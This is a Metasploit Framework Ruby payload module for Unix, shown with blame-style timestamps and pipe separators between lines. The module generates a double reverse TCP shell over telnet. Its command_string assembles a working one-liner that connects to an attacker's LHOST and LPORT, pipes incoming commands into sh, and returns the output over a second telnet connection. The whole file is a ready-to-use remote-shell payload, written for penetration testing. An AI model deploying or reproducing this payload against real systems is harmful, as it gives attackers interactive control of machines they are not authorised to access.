2006-01-14 20:12:53 +00:00
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/handler/reverse_tcp_double'
|
|
|
|
require 'msf/base/sessions/command_shell'
|
|
|
|
|
|
|
|
module Msf
|
|
|
|
module Payloads
|
|
|
|
module Singles
|
|
|
|
module Cmd
|
|
|
|
module Unix
|
|
|
|
|
|
|
|
module Reverse
|
|
|
|
|
|
|
|
include Msf::Payload::Single
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'Unix Command, Double reverse TCP connection (telnet)',
|
|
|
|
'Version' => '$Revision$',
|
|
|
|
'Description' => 'Creates an interactive shell through two inbound connections',
|
|
|
|
'Author' => 'hdm',
|
2006-01-21 22:10:20 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2006-01-14 20:12:53 +00:00
|
|
|
'Platform' => 'unix',
|
|
|
|
'Arch' => ARCH_CMD,
|
|
|
|
'Handler' => Msf::Handler::ReverseTcpDouble,
|
|
|
|
'Session' => Msf::Sessions::CommandShell,
|
|
|
|
'PayloadType' => 'cmd',
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Offsets' => { },
|
|
|
|
'Payload' => ''
|
|
|
|
}
|
|
|
|
))
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Constructs the payload
|
|
|
|
#
|
|
|
|
def generate
|
|
|
|
return super + command_string
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns the command string to use for execution
|
|
|
|
#
|
|
|
|
def command_string
|
|
|
|
cmd =
|
|
|
|
"sleep 7200|" +
|
|
|
|
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
|
|
|
|
"while : ; do sh && break; done 2>&1|" +
|
|
|
|
"telnet #{datastore['LHOST']} #{datastore['LPORT']}"
|
|
|
|
return cmd
|
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
end end end end end
|